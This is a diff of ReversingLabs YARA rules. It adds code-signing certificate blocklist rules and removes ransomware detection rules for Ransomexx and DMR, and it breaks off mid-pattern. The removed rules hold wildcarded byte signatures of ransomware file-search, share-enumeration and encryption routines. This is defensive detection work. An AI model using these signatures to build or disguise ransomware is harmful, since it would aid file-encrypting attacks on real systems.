REVERSINGLABS_Cert_Blocklist_6B72Ca367D40Fbef16E73E6Eba6A9A59 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "e1cf9568-9a6a-58cb-81a4-25063ccc1ac7" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13440-L13456" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2b20c16dafcd891c36b28b36093cd3ad3a15f3795f0f2adda61fb0db2835d02d" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($enum_volumes and $find_files and ( all of ($enum_shares_p*)) and ( all of ($encrypt_files_p*))) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="6b:72:ca:36:7d:40:fb:ef:16:e7:3e:6e:ba:6a:9a:59" and 1476748800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Ransomexx : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_736B7663D322533413F36E3E7E55F920 : INFO FILE { meta: - description = "Yara rule that detects Ransomexx ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "5e62660d-2696-56c7-9322-fed6ce9d36ff" - date = "2020-11-26" - modified = "2020-11-26" + id = "1991779a-8b5d-5188-8a36-c8451923e88f" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Ransomexx.yara#L1-L147" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "27b4132b7f16cafc40687e96a552ce59cc24ebf7679575680f170e3beee8a0a9" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13458-L13474" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "44e86319106a4bf8edba6c1be2f90d68b3d1ef4591f0cc23921a0dc4da4a407b" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Ransomexx" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_p1 = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B 7D ?? 85 FF 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8B F4 B3 ?? 85 F6 74 ?? C6 46 ?? ?? B0 ?? 66 C7 06 ?? ?? 88 5E ?? 88 - 46 ?? 8B C7 8D 50 ?? 90 8A 08 40 84 C9 75 ?? 2B C2 8B D0 8B C6 8D 78 ?? 8A 08 40 84 - C9 75 ?? 2B C7 8D 84 10 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? - 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 7D ?? 68 ?? ?? ?? ?? 57 50 FF 15 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 56 8B 75 ?? 56 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? - ?? 8B F0 89 75 ?? 83 FE ?? 75 ?? FF 15 ?? ?? ?? ?? 8D A5 ?? ?? ?? ?? 5F 5E 5B 8B E5 - 5D C3 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C4 89 45 ?? 85 C0 74 ?? C6 40 ?? ?? 88 18 88 - 58 ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 49 ?? 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 - ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F - 84 ?? ?? ?? ?? 8B 4D ?? 8D 85 ?? ?? ?? ?? 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A - } - $find_files_p2 = { - 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? - ?? ?? ?? 8B C7 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 8B D0 8D 85 ?? ?? ?? ?? 8D 70 ?? - 8D 64 24 ?? 8A 08 40 84 C9 75 ?? 8B 1D ?? ?? ?? ?? 2B C6 8D 94 10 ?? ?? ?? ?? 52 6A - ?? FF D3 50 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 56 FF - 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? - ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 6A ?? 56 FF 15 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 FF 15 ?? ?? ?? ?? 85 - C0 75 ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 6A ?? - FF D3 50 FF 15 ?? ?? ?? ?? 8B 75 ?? 8D 8D ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? ?? 85 C0 - 0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 - ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8D A5 ?? ?? ?? ?? 5F 5E - 5B 8B E5 5D C3 - } - $find_files_p3 = { - 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 8B 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 8B C7 - 8D 50 ?? 90 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 8D B4 00 ?? ?? ?? ?? 8D 86 - ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? - ?? ?? 56 57 53 FF 15 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? - 51 53 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 75 ?? 8B 3D ?? ?? ?? ?? FF D7 83 F8 ?? - 0F 84 ?? ?? ?? ?? FF D7 E9 ?? ?? ?? ?? 8D A4 24 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 68 ?? - ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 - 24 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? F6 44 24 ?? ?? 0F 85 ?? ?? ?? ?? 8B - 4D ?? 56 51 53 FF 15 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 56 8D 94 24 - ?? ?? ?? ?? 52 53 FF 15 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 - ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 - 74 ?? 66 83 38 ?? 74 ?? 68 ?? ?? ?? ?? 50 FF D7 85 C0 75 ?? FF 05 ?? ?? ?? ?? E9 ?? - ?? ?? ?? 8D 7C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 39 05 ?? ?? ?? ?? 0F 84 - ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 54 24 ?? 52 FF D7 85 C0 74 ?? 8D 44 - } - $find_files_p4 = { - 24 ?? 50 8D 4C 24 ?? 51 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 0F B7 44 24 ?? 8B 0D ?? - ?? ?? ?? 3B C1 74 ?? 49 3B C1 74 ?? 8D 54 24 ?? 52 8D 44 24 ?? 50 FF D7 85 C0 74 ?? - 8D 4C 24 ?? 51 8D 54 24 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 0F B7 44 24 ?? 8B - 0D ?? ?? ?? ?? 3B C1 74 ?? 49 3B C1 74 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? - ?? ?? ?? 8B 44 24 ?? 0B 44 24 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? - A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 6A ?? 6A ?? 50 51 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? - 80 3B ?? 75 ?? 80 7B ?? ?? 75 ?? 8B 15 ?? ?? ?? ?? 8D 3C 85 ?? ?? ?? ?? 8B 04 17 53 - 50 FF 15 ?? ?? ?? ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 3C 85 ?? ?? ?? ?? 8B 14 0F 68 ?? ?? - ?? ?? 52 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 0C 07 68 ?? ?? ?? ?? 53 51 FF 15 ?? ?? - ?? ?? 8B 15 ?? ?? ?? ?? 8B 04 17 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? - ?? 8B 54 24 ?? 8D 4C 24 ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 - ?? 50 FF 15 ?? ?? ?? ?? 53 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 5F 5E 33 C0 - 5B 8B E5 5D C2 - } - $enum_network_resources = { - 55 8B EC 8B 4D ?? 83 EC ?? 8D 45 ?? 50 51 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 - 0F 85 ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? - FF D3 50 FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 57 90 8B 4D ?? 8D - 55 ?? 52 56 8D 45 ?? 50 51 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? - ?? ?? 33 FF 39 7D ?? 76 ?? 83 C6 ?? 8D 64 24 ?? F6 46 ?? ?? 74 ?? F6 46 ?? ?? 74 ?? - 8B 06 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 8D 94 00 ?? ?? ?? ?? 52 - 6A ?? FF D3 50 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 04 8D ?? ?? ?? ?? 85 C0 74 ?? - 8B 16 0F B7 0A 66 89 08 83 C2 ?? 83 C0 ?? 66 85 C9 75 ?? FF 05 ?? ?? ?? ?? 8B 56 ?? - 83 E2 ?? 80 FA ?? 75 ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 47 83 C6 ?? 3B 7D ?? 72 - ?? 8B 75 ?? E9 ?? ?? ?? ?? 56 6A ?? FF D3 50 FF 15 ?? ?? ?? ?? 5F 8B 4D ?? 51 FF 15 - ?? ?? ?? ?? 5E 5B 8B E5 5D C3 - } - $encrypt_files_p1 = { - 55 8B EC 83 EC ?? 53 56 57 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? - 89 45 ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? B8 ?? ?? ?? ?? 89 4D ?? E8 ?? ?? ?? - ?? 8B F4 85 F6 0F 84 ?? ?? ?? ?? 8B D6 81 EA ?? ?? ?? ?? 83 C2 ?? 89 55 ?? 8B D6 81 - EA ?? ?? ?? ?? 83 C2 ?? 89 55 ?? 8B D6 8B CE 8B FE 81 EA ?? ?? ?? ?? 33 C0 81 E9 ?? - ?? ?? ?? 81 EF ?? ?? ?? ?? 83 C2 ?? C6 46 ?? ?? 89 55 ?? 8B 5D ?? 8A D0 80 E2 ?? 02 - 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 01 ?? ?? ?? ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ?? - ?? ?? 32 90 ?? ?? ?? ?? 88 94 07 ?? ?? ?? ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 32 - 90 ?? ?? ?? ?? 88 94 03 ?? ?? ?? ?? 8B 5D ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 32 - 90 ?? ?? ?? ?? 88 94 03 ?? ?? ?? ?? 8B 5D ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 32 - 90 ?? ?? ?? ?? 88 94 03 ?? ?? ?? ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 83 C0 ?? 32 - 90 ?? ?? ?? ?? 88 54 06 ?? 83 F8 ?? 0F 8C ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 4D ?? 50 51 - FF 15 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? - ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 55 ?? 52 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? C7 45 - ?? ?? ?? ?? ?? FF D6 85 C0 75 ?? 8B 3D ?? ?? ?? ?? 8D 49 ?? 68 ?? ?? ?? ?? FF D7 8D - 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF D6 85 C0 74 ?? 50 FF 15 ?? ?? ?? - ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B FC 85 FF 0F 84 ?? ?? ?? ?? 8B D7 81 EA ?? ?? ?? - ?? 83 C2 ?? 89 55 ?? 8B D7 81 EA ?? ?? ?? ?? 83 C2 ?? 89 55 ?? 8B D7 8B CF 8B F7 81 - } - $encrypt_files_p2 = { - EA ?? ?? ?? ?? 33 C0 81 E9 ?? ?? ?? ?? 81 EE ?? ?? ?? ?? 83 C2 ?? C6 47 ?? ?? 89 55 - ?? 8B 5D ?? 8A D0 80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 08 ?? ?? ?? ?? - 8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 30 ?? ?? ?? ?? 8D 50 ?? - 80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 18 ?? ?? ?? ?? 8B 5D ?? 8D 50 ?? - 80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 18 ?? ?? ?? ?? 8B 5D ?? 8D 50 ?? - 80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 18 ?? ?? ?? ?? 8D 50 ?? 80 E2 ?? - 02 90 ?? ?? ?? ?? 83 C0 ?? 32 90 ?? ?? ?? ?? 88 54 07 ?? 83 F8 ?? 0F 8C ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8B D8 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C8 2B 4D ?? - B8 ?? ?? ?? ?? F7 E1 8B CA C1 E9 ?? B8 ?? ?? ?? ?? F7 E1 C1 EA ?? 8B C2 C1 E0 ?? 2B - C2 03 C0 03 C0 2B C8 8B F2 B8 ?? ?? ?? ?? F7 E6 A1 ?? ?? ?? ?? 51 C1 EA ?? 8B CA C1 - E1 ?? 2B CA 03 C9 03 C9 2B F1 56 52 8B 15 ?? ?? ?? ?? 52 50 53 57 E8 ?? ?? ?? ?? 83 - C4 ?? 85 DB 0F 84 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8B D8 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C8 2B - 4D ?? B8 ?? ?? ?? ?? F7 E1 8B CA C1 E9 ?? B8 ?? ?? ?? ?? F7 E1 C1 EA ?? 8B C2 C1 E0 - ?? 2B C2 03 C0 03 C0 2B C8 8B F2 B8 ?? ?? ?? ?? F7 E6 A1 ?? ?? ?? ?? 51 C1 EA ?? 8B - CA C1 E1 ?? 2B CA 03 C9 03 C9 2B F1 56 52 8B 15 ?? ?? ?? ?? 52 50 53 57 E8 ?? ?? ?? - ?? 83 C4 ?? 85 DB 0F 85 ?? ?? ?? ?? 8D 65 ?? 5F 5E 5B 8B E5 5D C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Net Technology" and pe.signatures[i].serial=="73:6b:76:63:d3:22:53:34:13:f3:6e:3e:7e:55:f9:20" and 1159488000<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_54A170102461Fdc967Acfafe4Bbbc7F0 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "d012df1d-5e85-57b4-8a79-5da91369a14a" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13476-L13492" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ddae18d566fa2fd077f51d0afff74fb8a8e525f88f23908c7402a4b2c092ad24" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($enum_network_resources) and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="54:a1:70:10:24:61:fd:c9:67:ac:fa:fe:4b:bb:c7:f0" and 1476748800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_DMR : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_0C501B8B113209C96C8119Cf7A6B8B79 : INFO FILE { meta: - description = "Yara rule that detects DMR ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "45d8f91f-d2d0-5c6e-a29e-b8c9c29dc296" - date = "2020-07-15" - modified = "2020-07-15" + id = "9ec73230-10cd-55ad-9ef7-56a875294cab" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.DMR.yara#L1-L214" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "55e19f3017c2cc8355c27f9a516e611b58b108f15bfed41b88d5662b55677a59" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13494-L13510" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "dca37fda83650979566fb6ffbedaf713955a3c7f03ecc62e2e155475b7ca00e4" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "DMR" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_p1 = { - 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 55 ?? 53 - 57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ?? - 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ?? ?? ?? 8A 01 88 85 ?? ?? ?? - ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? - ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 8A C3 75 ?? B0 ?? 2B - CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D ?? ?? ?? ?? 56 1B C0 89 9D ?? ?? ?? ?? - 23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? - ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? F7 D8 - 1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 - ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ?? - ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? - ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? - ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? - ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74 - } - $find_files_p2 = { - 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? - ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? - 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? - ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ?? - 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15 ?? ?? ?? - ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C3 8B 4D ?? - 5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3 - } - $encrypt_files_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 89 B5 ?? ?? ?? ?? C7 45 ?? - ?? ?? ?? ?? 8D 45 ?? 83 7D ?? ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 - ?? 85 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? - ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8D 55 ?? FF B5 ?? ?? ?? - ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? - 8B 55 ?? 88 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA - ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 - E8 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 83 C4 ?? 84 C0 0F 84 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? - ?? 8D 55 ?? FF B5 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 45 ?? - 83 7D ?? ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 83 E0 ?? 8D 4D ?? 83 7D ?? ?? 50 0F 43 - } - $encrypt_files_p2 = { - 4D ?? 51 FF 15 ?? ?? ?? ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 8D 8D - ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? - ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D BE ?? - ?? ?? ?? C6 45 ?? ?? 83 7F ?? ?? 8B C7 89 BD ?? ?? ?? ?? 72 ?? 8B 07 83 7F ?? ?? 75 - ?? 0F B6 00 3C ?? 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 75 ?? C7 86 ?? ?? ?? ?? ?? - ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 8B 86 ?? ?? ?? ?? 6A ?? 50 8D 4D ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 8B 86 ?? ?? - ?? ?? 83 7D ?? ?? 99 0F 43 4D ?? 52 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? - ?? ?? ?? 8B 55 ?? 3B CA 77 ?? 83 7D ?? ?? 8D 45 ?? 89 4D ?? 0F 43 45 ?? C6 04 01 ?? - EB ?? 8B 45 ?? 8B F9 2B FA 2B C2 3B F8 77 ?? 83 7D ?? ?? 8D 75 ?? 57 0F 43 75 ?? 03 - } - $encrypt_files_p3 = { - F2 89 4D ?? 6A ?? 56 E8 ?? ?? ?? ?? C6 04 3E ?? 83 C4 ?? 8B B5 ?? ?? ?? ?? EB ?? 6A - ?? 57 C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B BD ?? ?? - ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? - ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 - ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? - 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 50 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 89 8D ?? ?? ?? ?? 8B 01 FF 50 ?? 8D - 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? - ?? ?? C6 45 ?? ?? 8B 8D ?? ?? ?? ?? 85 C9 74 ?? 8B 01 8B 40 ?? FF D0 85 C0 74 ?? 8B - 08 